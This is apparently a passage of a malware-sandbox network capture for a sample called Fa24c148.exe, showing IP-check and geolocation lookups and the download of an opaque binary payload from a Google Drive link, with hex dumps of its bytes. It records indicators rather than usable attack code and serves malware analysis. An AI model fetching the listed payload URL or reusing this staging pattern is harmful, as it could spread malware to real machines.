                                                                                                  Oct 28, 2024 12:22:46.117404938 CET151OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Connection: Keep-Alive
                                                                                                  Oct 28, 2024 12:22:47.209151983 CET323INHTTP/1.1 200 OK
                                                                                                  Date: Mon, 28 Oct 2024 11:22:46 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 106
                                                                                                  Connection: keep-alive
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  X-Request-ID: 04db32d7af3f4445d1f1e69dccb32a15
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>
                                                                                                  Oct 28, 2024 12:22:47.252171040 CET323INHTTP/1.1 200 OK
                                                                                                  Date: Mon, 28 Oct 2024 11:22:46 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 106
                                                                                                  Connection: keep-alive
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  X-Request-ID: 04db32d7af3f4445d1f1e69dccb32a15
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  7192.168.2.449760132.226.247.73801440C:\Users\user\Desktop\Fa24c148.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 28, 2024 12:22:47.971232891 CET151OUTGET / HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                  Host: checkip.dyndns.org
                                                                                                  Connection: Keep-Alive
                                                                                                  Oct 28, 2024 12:22:48.838175058 CET323INHTTP/1.1 200 OK
                                                                                                  Date: Mon, 28 Oct 2024 11:22:48 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 106
                                                                                                  Connection: keep-alive
                                                                                                  Cache-Control: no-cache
                                                                                                  Pragma: no-cache
                                                                                                  X-Request-ID: 95f4d2aee2592ff8891bc0ff29780874
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.2.449736142.250.185.2064431440C:\Users\user\Desktop\Fa24c148.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-10-28 11:22:28 UTC216OUTGET /uc?export=download&id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6 HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                  Host: drive.google.com
                                                                                                  Cache-Control: no-cache
                                                                                                  2024-10-28 11:22:28 UTC1610INHTTP/1.1 303 See Other
                                                                                                  Content-Type: application/binary
                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                  Date: Mon, 28 Oct 2024 11:22:28 GMT
                                                                                                  Location: https://drive.usercontent.google.com/download?id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6&export=download
                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                  Content-Security-Policy: script-src 'nonce-zVBkfH63nyw31ybQORX5LQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                  Server: ESF
                                                                                                  Content-Length: 0
                                                                                                  X-XSS-Protection: 0
                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                  Connection: close


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  1192.168.2.449737142.250.186.654431440C:\Users\user\Desktop\Fa24c148.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-10-28 11:22:29 UTC258OUTGET /download?id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6&export=download HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                  Cache-Control: no-cache
                                                                                                  Host: drive.usercontent.google.com
                                                                                                  Connection: Keep-Alive
                                                                                                  2024-10-28 11:22:31 UTC4917INHTTP/1.1 200 OK
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Security-Policy: sandbox
                                                                                                  Content-Security-Policy: default-src 'none'
                                                                                                  Content-Security-Policy: frame-ancestors 'none'
                                                                                                  X-Content-Security-Policy: sandbox
                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                  Cross-Origin-Embedder-Policy: require-corp
                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  Content-Disposition: attachment; filename="RJvGhLEx125.bin"
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  Access-Control-Allow-Credentials: false
                                                                                                  Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                  Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                  Accept-Ranges: bytes
                                                                                                  Content-Length: 275520
                                                                                                  Last-Modified: Sun, 27 Oct 2024 21:04:17 GMT
                                                                                                  X-GUploader-UploadID: AHmUCY2my2hW6vQEgvUZF1nObheGCP9DibUFW4wfZcBp9IQFlKDV_qHjc2sE5BGyiTNUDQApV6VADaNRgA
                                                                                                  Date: Mon, 28 Oct 2024 11:22:31 GMT
                                                                                                  Expires: Mon, 28 Oct 2024 11:22:31 GMT
                                                                                                  Cache-Control: private, max-age=0
                                                                                                  X-Goog-Hash: crc32c=CojfBQ==
                                                                                                  Server: UploadServer
                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                  Connection: close
                                                                                                  2024-10-28 11:22:31 UTC4917INData Raw: d8 d7 11 22 bc 6a 66 62 06 37 45 40 80 d6 17 2e bd b3 66 d1 7a db 17 8e 81 fe 56 0e f3 11 0b 50 0a cb 56 29 11 dc 42 ba a4 7e 42 b0 8e ab 94 1d 8f 36 b9 a5 07 d2 1c 20 8a 88 e2 3b 0f dd 50 d9 4d 52 c0 63 51 9c 25 22 7b 40 d6 f2 6e a0 b0 12 6e 3a 76 64 88 8c 81 96 bf 58 af ea 01 b4 d9 0c c1 96 09 a5 cf d0 c9 70 3e fc 4e d3 40 39 ea 9b 56 c7 5b 86 91 32 32 28 c8 86 1d 88 5a 55 cc d6 34 97 0d 1d bc 67 cc 26 85 2b 6e 75 fc c2 3d 34 c4 b4 95 b0 90 dc 0c 81 75 ba 6e 19 6a 13 c1 9f 93 4e 30 3c 9e d1 62 5f e8 c7 f6 a0 5a 8c 2f 15 7b dd 0e 08 d8 c3 17 a4 0a 04 38 80 5d 68 e4 7e 40 e5 3d 0a 97 29 00 48 66 fc 52 ac 5c 09 6f d6 d9 5c a9 28 80 a8 a4 19 80 47 a8 d6 29 86 fe d6 0a 55 d9 a5 a6 0c 47 43 10 74 76 79 e9 d9 e7 3d 4a 69 92 44 2c aa e6 4c 70 95 5a 18 b7 c8 52
                                                                                                  Data Ascii: "jfb7E@.fzVPV)B~B6 ;PMRcQ%"{@nn:vdXp>N@9V[22(ZU4g&+nu=4unjN0<b_Z/{8]h~@=)HfR\o\(G)UGCtvy=JiD,LpZR
                                                                                                  2024-10-28 11:22:32 UTC4865INData Raw: 8b 47 63 53 5d 47 11 b7 14 dd ab ac 53 98 f6 00 89 65 a1 53 ad 12 5a 90 49 47 65 80 bb 8e 0e e8 9e dd d7 da 5d 24 c5 df de 42 37 b4 a8 93 e4 9b 18 17 7a 07 88 15 bd 3f 86 14 94 37 09 dd 6a af 14 f5 c5 da 54 8a 29 f8 74 b5 1d 1a cc 56 43 2a 8c bf 1a ad 6c b5 ef e2 2e 7d 30 76 d9 7b c4 fe 7c 44 5b 53 5b 1d 96 46 1e 10 19 d8 45 17 88 f2 21 3f 0f ca 49 e9 54 74 4a b2 2f 29 84 ae 54 6a 12 02 34 a4 5f 6e f3 3a c2 b2 8c 89 e7 c6 0b 10 2b 19 ce eb 83 e1 b0 0b 10 35 55 1b 0e fa 73 0f c1 d6 2b ea 3b bd 6a cd 10 50 e8 36 71 5e ae a8 df 4f a3 ae c4 19 24 8a de 87 bf 01 4b 8b 0c 77 56 f7 59 25 15 fd b5 78 ce 82 4f 7d 81 15 46 73 4d d9 eb 95 7c 33 c3 8f 32 0b 27 3d da 85 e5 af 99 c9 05 0e a0 f1 ea e6 8f 97 17 fd 89 c4 a9 a9 be 6c e8 86 27 0b e5 88 f7 18 34 98 1e 64 4b
                                                                                                  Data Ascii: GcS]GSeSZIGe]$B7z?7jT)tVC*l.}0v{|D[S[FE!?ITtJ/)Tj4_n:+5Us+;jP6q^O$KwVY%xO}FsM|32'=l'4dK
                                                                                                  2024-10-28 11:22:32 UTC1323INData Raw: de 93 1c 72 14 b6 6f f2 f5 2b f3 91 a2 94 85 96 0f 24 f3 6d f9 a2 9c fd d1 e5 2e a1 22 46 d4 6f 08 0a 56 c8 5a ed e2 04 31 26 48 04 40 ac 08 b6 65 f3 e2 ad 21 55 f0 8b 8d 2f 65 30 6f a0 2a ab 7e 45 e0 0d 91 6f ab 57 a3 8e 3b a3 a1 a8 d1 eb 5c 39 80 32 88 0c 84 72 0d e7 ee 96 c2 7e e8 9a 53 33 28 99 bd 7e 80 c0 09 40 4a 09 5f f4 3d fe ed 98 44 fa 23 2b b4 89 d4 c3 15 49 b2 fa 94 c3 cf 06 ef 4b a0 80 08 8d dc 22 f1 eb 8e 76 65 f1 be 8e 88 1f 09 34 e1 01 e2 91 01 4a 1a 9e 49 37 5b c8 16 04 63 8d 70 c5 bf db b3 36 00 4d 02 8b 7f c8 4f ca 0d ed a7 9f 66 48 1e 76 37 3b 49 89 63 cd 68 d9 6e 16 74 f1 13 7c 48 09 d8 54 0a 6d 92 ac 17 ff 6b 66 88 84 d1 41 61 06 5b f2 6e f2 9a a1 b1 64 8e cb b5 19 9d 2d 01 67 1a 5a 33 06 3a 8c 49 55 a5 8b 70 16 fb 0c 48 14 a1 b7 c0
                                                                                                  Data Ascii: ro+$m."FoVZ1&H@e!U/e0o*~EoW;\92r~S3(~@J_=D#+IK"ve4JI7[cp6MOfHv7;Ichnt|HTmkfAa[nd-gZ3:IUpH
                                                                                                  2024-10-28 11:22:32 UTC1378INData Raw: cb 60 00 a0 55 21 3f 14 68 6c d9 45 21 45 b8 54 8c 89 ed 2a 52 18 01 5f 5a 7a 74 8b 2c a9 b2 fc 21 c2 da 6a 2a a6 46 ca 49 a7 92 a7 8c 1f 3f 25 be 21 e0 15 0f cb b3 70 85 5c b7 79 e6 64 b5 a8 36 7b 53 8b cd c4 ae b1 a4 a7 bf 01 8c f2 3b a8 72 2b 29 29 65 37 a7 56 34 60 2c fb 61 b0 b0 5c 7b 94 b1 61 06 53 e8 e8 9f 0c 4f e5 fa 23 0d 01 26 e9 95 a2 d8 99 c9 05 0e 5c e0 e2 89 e2 bf 60 f7 84 10 a7 a9 d1 56 c4 8e 32 1f ab fb f8 0b 3e e8 bc a5 45 55 a9 a7 9d 09 36 9f 8c 3c 95 59 89 5e bd b0 61 d0 32 97 36 91 01 4c 9e 72 b1 43 dc 70 63 5f 78 bc 89 a5 13 15 e5 71 c4 2f 71 82 87 76 30 01 43 9a 1b a5 ad 52 07 e6 24 a0 d9 aa a0 3f 80 f0 57 9c 1f 86 87 f7 32 1c 45 f4 4b 38 e8 75 50 b1 44 37 fd 94 66 13 4a 6c 19 03 08 d5 d2 05 1e 40 ba 9d 6e f9 23 3a 9a e4 cf dc 4c 81
                                                                                                  Data Ascii: `U!?hlE!ET*R_Zzt,!j*FI?%!p\yd6{S;r+))e7V4`,a\{aSO#&\`V2>EU6<Y^a26LrCpc_xq/qv0CR$?W2EK8uPD7fJl@n#:L
                                                                                                  2024-10-28 11:22:32 UTC1378INData Raw: 3b dc 01 f8 3b e0 0f 26 df ee 17 05 2c 1e 78 2d 64 89 02 0d ec 45 fc 9f 5d aa cb c4 64 3d 1d 21 f0 1a 8e 8e bc 0d 44 52 d4 2f da a8 d8 2c 96 10 07 8f 9b 5c 36 80 50 2f 30 dc bb 12 cb c8 10 9f b8 8a bb 57 61 11 fe 7a d5 51 6e 78 45 91 a0 97 2d 46 d8 d4 38 ec 0e b8 dc 69 20 18 71 d6 1c 23 04 d2 01 1a c8 c0 b6 23 11 56 0d 87 b8 c7 0f d2 52 b3 e5 c1 00 9e 1c 6c 30 9b ac 7f bd ec 9f 24 9a ef ab 3d a7 bc b4 b9 5d 37 f9 67 d1 b2 b3 4d 4c 0d 47 42 4b 5f d1 6c de 42 4c 85 e3 6f 29 d0 90 63 74 04 db d2 43 1d 08 01 7e 95 48 e1 f8 bc bf c0 06 a1 54 ed 8b b8 e0 29 80 73 ea 56 9a 45 33 24 9f 36 18 be c2 80 e2 e9 4d 3f eb 6a 09 dc b0 19 d3 0c 57 c9 e4 36 41 e2 5a 19 b9 e3 4f fc 03 a6 d9 e3 fc 67 30 4a ea 70 cf d1 b1 82 03 0e 64 4e 1d 74 64 ee 01 73 f5 5f a1 37 b8 6d de
                                                                                                  Data Ascii: ;;&,x-dE]d=!DR/,\6P/0WazQnxE-F8i q##VRl0$=]7gMLGBK_lBLo)ctC~HT)sVE3$6M?jW6AZOg0JpdNtds_7m
                                                                                                  2024-10-28 11:22:32 UTC1378INData Raw: d3 36 a7 df 82 d6 6f 28 74 79 d9 5a 97 8c 65 21 22 57 fc 68 2d 02 c4 35 e4 1c dc 24 7a 60 8c b4 15 72 ce 6c aa 38 6c da 7f e0 0d e9 2f 6b 57 a7 f6 86 60 a1 d8 cd c3 ae fb 80 38 94 e1 8d 68 02 a0 f0 97 c2 7a 8f 89 06 33 22 f7 51 53 80 ca 03 23 5b 76 9a 84 2a 79 90 a5 44 fb 02 52 0c cd d4 c9 11 70 be 88 13 d5 a0 cf c7 ff aa f2 17 ea 41 42 d9 c0 a6 2d 6f 8f ff e1 4f 1b 21 74 e1 10 e0 f2 93 0a 1a 9a 60 58 4d ba 27 a9 77 e9 c6 c8 12 f3 07 3c 74 c4 a0 ae 66 b6 1a cd 7f ca 15 ba 0f 59 9d 76 37 35 eb a4 07 fd 11 d6 6a 18 95 d4 08 06 11 b5 d8 50 a2 27 33 de 90 fa 6b 3e 70 ac a4 4b 7c 81 74 3a 6e f3 b5 b7 bd 51 9b cb c1 c8 71 3a 29 d9 09 53 47 95 1f 94 3f 72 3f 89 00 c4 c8 3d b7 2c a1 bd d2 89 36 ab e5 04 5a 2c 87 67 5a a0 91 7a 0b 90 28 8b 1b 37 f3 35 f8 4d 2f cc
                                                                                                  Data Ascii: 6o(tyZe!"Wh-5$z`rl8l/kW`8hz3"QS#[v*yDRpAB-oO!t`XM'w<tfYv75jP'3k>pK|t:nQq:)SG?r?=,6Z,gZz(75M/
                                                                                                  2024-10-28 11:22:32 UTC1378INData Raw: 69 30 90 63 04 45 f2 53 27 0a 9f c4 0b 67 88 5c 71 83 0f 55 00 4e a2 eb 9f 76 fe d0 9e 3f 62 a0 35 cb 89 8a bf 83 a6 a5 0e 7c ea ee 98 f9 f8 cc f7 84 10 a7 a9 97 aa c4 8e 36 0e 8a 9f df 6e 3e 98 c8 ba 65 55 a1 8f d4 21 41 95 9d 14 eb 05 04 1e b9 98 5e f5 24 e3 a2 44 11 19 9e 07 b1 43 d0 c1 65 48 2e 9b 89 a5 1d 69 c0 69 b6 f6 1e b5 f7 5e 74 73 d6 9e b9 f0 a2 04 c0 e6 24 ae 6d 71 bb 5e a1 f3 73 c0 e1 be 11 ac bf 5c 44 d1 5c 6f c5 08 d7 d1 e6 62 48 99 c5 3b fe 66 bb 2c b2 82 9f 78 61 25 18 c8 d5 a2 02 12 2e e0 6d f3 f4 d6 23 76 4f 0e 94 8e 5f a1 f9 e5 4b 98 d6 47 04 65 45 ea 31 9a df 97 f1 44 0e 1d c5 b8 37 99 4a f6 b4 0b e3 87 b5 13 f0 e9 b8 33 c8 e5 72 76 e6 5d 2c 11 52 6b 5e 6e d7 8f 09 eb b0 c8 1a 31 dd 9a 61 55 ff a6 f9 e8 f1 85 6b a9 27 30 99 cd 0e 83
                                                                                                  Data Ascii: i0cES'g\qUNv?b5|6n>eU!A^$DCeH.ii^ts$mq^s\D\obH;f,xa%.m#vO_KGeE1D7J3rv],Rk^n1aUk'0
                                                                                                  2024-10-28 11:22:32 UTC1378INData Raw: 36 c1 a0 b7 7b 5e 1f b0 c1 06 ea 1f 1e 63 1c 23 25 d4 08 03 d6 de 57 80 7e 08 07 87 b2 d6 0e c3 c6 b3 e5 cf 28 8b 10 6c 33 d8 67 76 d2 e7 9f 35 98 91 4d e3 b4 9d e2 b6 5d 37 f7 07 69 b2 9b 25 23 c0 4d 9f 22 59 c0 64 cf 44 23 35 d1 6f 23 d4 f3 f0 19 cb ab c4 61 9c 20 65 74 83 b0 e0 35 a9 8b ed 0b 6b 56 e7 98 cc cf 01 e2 77 98 3d 54 45 43 32 b7 c9 2d be c8 92 6e 7d 5c 39 8a 7a 18 6d b1 19 d9 1a bd 36 f1 00 50 e9 65 a1 78 e3 4f 88 00 67 d9 e7 de 8c 43 88 e0 63 c9 bc 80 93 04 74 2c 51 0c 70 67 3b 29 f2 ff 30 6f 21 46 66 cd ed 07 a0 8a 81 a0 0d 7c d2 a5 52 8d c1 4e ed 68 08 fd 71 a7 de 2d 6c a9 a1 ab a4 80 38 1a 89 7d 18 17 a1 4f 6b 71 51 2d c0 4b 68 4e a5 12 6c c8 ab 5e e6 cb b7 78 91 09 d3 3b 81 03 7f a9 c4 e1 63 cf 91 5c 77 e8 ad 64 0a cb da 3f cd d9 a0 4c
                                                                                                  Data Ascii: 6{^c#%W~(l3gv5M]7i%#M"YdD#5o#a et5kVw=TEC2-n}\9zm6PexOgCct,Qpg;)0o!Ff|RNhq-l8}OkqQ-KhNl^x;c\wd?L
                                                                                                  2024-10-28 11:22:32 UTC1378INData Raw: 9f 42 66 9a dc 67 f4 93 af 59 77 67 44 72 88 f1 df 67 71 ac 88 63 71 ea 61 ef 4b a0 80 08 5d 64 2a 83 ce a9 2d 15 53 91 f8 31 27 09 3e e5 b2 cf 96 fe 3b 19 9e 38 b0 68 a1 53 2b 63 fd d6 42 8d ef 75 03 16 47 d0 0c 4f cf 1a c5 07 f2 59 ba 7f 3c 35 54 2c b2 ab ac 79 be 34 c0 1c 21 c1 d4 78 a0 47 1e f0 e4 a8 48 84 7c b5 e8 19 43 25 ac d4 e3 44 15 4a 02 6e f2 94 03 ea 42 fc fa b2 6a 24 8f 29 18 09 53 47 24 19 9a 65 51 30 89 7a 66 cd 24 c5 14 a1 95 a1 2b 13 bb 97 7d 2b 13 f7 c5 7b aa cd 14 6c 87 2c 94 8b 28 f3 3f 5e 40 7a be d7 48 91 88 dd 51 7f 35 37 a6 ef 02 51 98 d7 58 01 55 17 91 f3 23 31 c2 0e dc 0e d3 b6 df 60 42 73 d0 06 38 ef 4c f7 a5 6f 3b e5 31 e1 09 c4 0d db 02 b1 18 f7 09 7f 3c b0 fd 2a 61 3b 7c 6d 42 75 aa b6 9e 59 54 66 71 67 41 3e b2 20 74 15 3f
                                                                                                  Data Ascii: BfgYwgDrgqcqaK]d*-S1'>;8hS+cBuGOY<5T,y4!xGH|C%DJnBj$)SG$eQ0zf$+}+{l,(?^@zHQ57QXU#1`Bs8Lo;1<*a;|mBuYTfqgA> t?
                                                                                                  2024-10-28 11:22:32 UTC1378INData Raw: 54 a8 88 2d 39 24 91 46 31 0e 69 b6 42 99 0a d6 63 4a 2d 59 cf 89 d5 6a 19 e5 71 ce 40 dc b5 87 7c 34 0d ea 98 1b d1 c8 b3 86 e6 2e b9 de 2a 90 2c a4 e5 01 25 41 9b 7a a1 1a 9d 44 d1 57 5c 2d 7b 43 d3 f7 00 c6 b0 c3 02 5d 09 71 26 10 ad 87 0a 35 3b 18 a9 66 91 74 f0 9a e0 67 f9 56 e2 28 7a 10 1c 94 fa d5 42 8c e5 41 fd b8 6f 71 6f 45 f1 33 fa 97 50 e4 40 00 58 da b8 33 ee de bf b4 01 86 38 00 01 fa 99 81 60 d9 e9 1b a9 f8 4c 32 39 07 67 31 a7 d7 52 82 ea 6e d8 1a 31 dd 9a 61 55 ff aa f9 e8 f1 85 6b a9 27 30 99 cd 0e 83 b0 44 d5 7d 91 cc 14 f6 51 42 14 23 62 24 ea 8b be 4a 75 4b 18 59 92 b4 66 a7 04 b4 59 42 8f ea 7c e8 25 eb 90 e1 a0 98 20 e7 bf 36 23 e5 ca dc 97 ca 30 bc 82 81 d9 5a 6f 65 62 a1 65 67 20 30 f9 83 93 4e 5b 40 c1 bc 6a ce a4 3d 49 63 4a 2f
                                                                                                  Data Ascii: T-9$F1iBcJ-Yjq@|4.*,%AzDW\-{C]q&5;ftgV(zBAoqoE3P@X38`L29g1Rn1aUk'0D}QB#b$JuKYfYB|% 6#0Zoebeg 0N[@j=IcJ/


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  2192.168.2.449739188.114.97.34431440C:\Users\user\Desktop\Fa24c148.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-10-28 11:22:36 UTC87OUTGET /xml/155.94.241.188 HTTP/1.1
                                                                                                  Host: reallyfreegeoip.org
                                                                                                  Connection: Keep-Alive
                                                                                                  2024-10-28 11:22:36 UTC888INHTTP/1.1 200 OK
                                                                                                  Date: Mon, 28 Oct 2024 11:22:36 GMT
                                                                                                  Content-Type: text/xml
                                                                                                  Content-Length: 358
                                                                                                  Connection: close
                                                                                                  apigw-requestid: AVhc-iOyPHcEJSw=
                                                                                                  Cache-Control: max-age=86400
                                                                                                  CF-Cache-Status: HIT
                                                                                                  Age: 37187
                                                                                                  Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT
                                                                                                  Accept-Ranges: bytes
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a9YXNfPZRvaOQs9KRFdcga0f%2B2IP1O%2B3z9margCie3V%2FzbXYXhF8AZtW8hAOpxlyq8UdoJXY2bA8Fpr22s5gvC%2FYLuRWJazUYwf64%2FIRD804qXcuQMxUMIFGXLvBrqjqwYo1F%2FAw"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8d9a8c888e216b2c-DFW
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1122&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2524847&cwnd=251&unsent_bytes=0&cid=49c0b130e4527081&ts=264&x=0"
                                                                                                  2024-10-28 11:22:36 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                                                                                  Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  3192.168.2.449740188.114.97.34431440C:\Users\user\Desktop\Fa24c148.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-10-28 11:22:37 UTC63OUTGET /xml/155.94.241.188 HTTP/1.1
                                                                                                  Host: reallyfreegeoip.org
                                                                                                  2024-10-28 11:22:37 UTC881INHTTP/1.1 200 OK
                                                                                                  Date: Mon, 28 Oct 2024 11:22:37 GMT
                                                                                                  Content-Type: text/xml
                                                                                                  Content-Length: 358
                                                                                                  Connection: close
                                                                                                  apigw-requestid: AVhc-iOyPHcEJSw=
                                                                                                  Cache-Control: max-age=86400
                                                                                                  CF-Cache-Status: HIT
                                                                                                  Age: 37188
                                                                                                  Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT
                                                                                                  Accept-Ranges: bytes
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o1M9fXG%2F6lVa5TTRDb0latHkHuPSJosvyv5yd1%2BFpWqTNmYyK2i2OZcoJLeSgkJXWZkS09vGBeCCAq6epVadDaDR1LPLFqEEOg39jsbx9Mp1xbc8uuaCjt%2B0BlOcTAPkjItOuSUO"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8d9a8c901fc4473e-DFW
